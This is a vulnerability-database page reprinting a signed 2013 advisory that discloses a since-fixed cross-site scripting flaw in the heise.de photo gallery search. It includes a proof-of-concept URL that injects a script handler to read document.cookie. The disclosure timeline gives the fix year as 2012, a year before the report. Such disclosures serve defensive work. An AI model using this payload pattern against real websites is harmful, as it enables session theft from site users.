Lucene search

Heise.de Cross Site Scripting

🗓️ 11 Jan 2013 00:00:00Reported by Stefan SchurtzType

packetstorm🔗 packetstormsecurity.com👁 19 Views

heise.de Cross-site Scripting vulnerability, fixe

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Advisory: heise.de - Cross-site Scripting vulnerability  
Advisory ID: SSCHADV2013-002  
Author: Stefan Schurtz  
Affected Software: Successfully tested on heise.de  
Vendor URL: http://www.heise.de  
Vendor Status: fixed  
  
==========================  
Vulnerability Description  
==========================  
  
http://www.heise.de is prone to a XSS vulnerability  
  
==========================  
PoC-Exploit  
==========================  
  
http://www.heise.de/foto/galerie/suche/photo/?suchwort="  
onMouseMove=alert(document.cookie) '  
  
==========================  
Solution  
==========================  
  
fixed  
  
==========================  
Disclosure Timeline  
==========================  
  
03-Jan-2013 - informed heise Security  
04-Jan-2012 - fixed by developer  
  
==========================  
Credits  
==========================  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
==========================  
References  
==========================  
  
http://www.darksecurity.de/advisories/2013/SSCHADV2013-002.tx  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.12 (MingW32)  
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools  
Comment: Download at: http://thunderbird.gnupt.de  
  
iEYEARECAAYFAlDvDLoACgkQg3svV2LcbMDbqgCfTc5ncA0O7zWRT3jOronFOPxC  
Gr4An2tcntS/f/j14F5POgHPNBpxvC13  
=hyEA  
-----END PGP SIGNATURE-----  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

11 Jan 2013 00:00Current

7.4High risk

Vulners AI Score7.4